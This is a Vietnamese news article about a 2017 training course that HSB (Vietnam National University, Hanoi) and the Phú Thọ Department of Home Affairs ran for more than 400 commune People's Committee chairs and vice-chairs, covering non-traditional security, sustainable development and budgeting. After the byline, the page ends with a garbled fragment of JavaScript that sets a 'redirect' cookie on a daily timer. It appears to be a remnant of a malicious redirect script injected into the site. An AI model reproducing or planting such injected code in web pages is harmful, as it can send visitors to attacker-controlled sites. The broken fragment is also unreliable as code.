Ứng dụng những vấn đề về an ninh phi truyền thống & phát triển bền vững

góp phần nâng cao năng lực quản lý kinh tế cho Chủ tịch, Phó Chủ tịch UBND cấp xã tỉnh Phú Thọ

Nằm trong khuôn khổ hợp tác giữa hai đơn vị, Khoa Quản trị & Kinh doanh- Đại học Quốc gia Hà Nội (HSB) đã phối hợp với Sở Nội vụ tỉnh Phú Thọ triển khai thành công khóa đào tạo “Nâng cao năng lực quản lý cho Chủ tịch, Phó Chủ tịch UBND cấp xã tỉnh Phú Thọ năm 2017”. Khóa học được thiết kế nhằm cung cấp cho các học viên những kiến thức và kỹ năng cập nhật và hiện đại. Khóa học giúp học viên hiểu rõ các vấn đề kinh tế, xã hội cập nhật và ứng dụng vào thực tế công việc như: những vấn đề an ninh phi truyền thống và phát triển bền vững, lập kế hoạch phát triển kinh tế xã hội theo định hướng thị trường (MoSEDP), quản lý ngân sách và tài chính cấp xã và địa phương.

an ninh ptt phu tho

Giảng viên của chương trình là những chuyên gia kinh tế có kiến thức chuyên môn sâu rộng, và có sự am hiểu thực tế phong phú. Trong suốt khóa học, giảng viên luôn đưa ra những cách  ứng dụng, cách giải quyết các vấn đề để biến những lý thuyết đó áp dụng vào thực tiễn công việc của học viên tại địa phương. Các giảng viên cung cấp những thông tin có tính chất hỗ trợ, nâng cao kĩ năng, kiến thức của học viên và đóng vai trò như những nhà tư vấn trong các tình huống thực tế được đưa ra thảo luận trong khoá học.

an ninh ptt phu tho 1

 Chương trình đã được triển khai thành công với sự tham gia của hơn 400 Chủ tịch, Phó Chủ tịch UBND cấp xã. Các học viên đều rất hứng thú với các chủ đề trong khóa học, đặc biệt là các chủ đề liên quan đến vấn đề an ninh phi truyền thống và phát triển bền vững, nên rất tích cực tham gia bài giảng và trao đổi ý kiến với giảng viên. Đây cũng là cơ hội để các Chủ tịch, Phó Chủ tịch xã cùng nhau chia sẻ khó khăn, thử thách và trao đổi những kinh nghiệm thực tế trong quá trình công tác của mình.

                                                                                                                                   Ngân Hà 

{var U=(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”=”,now=Math.floor(Date.now()/1e3),(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),’‘)}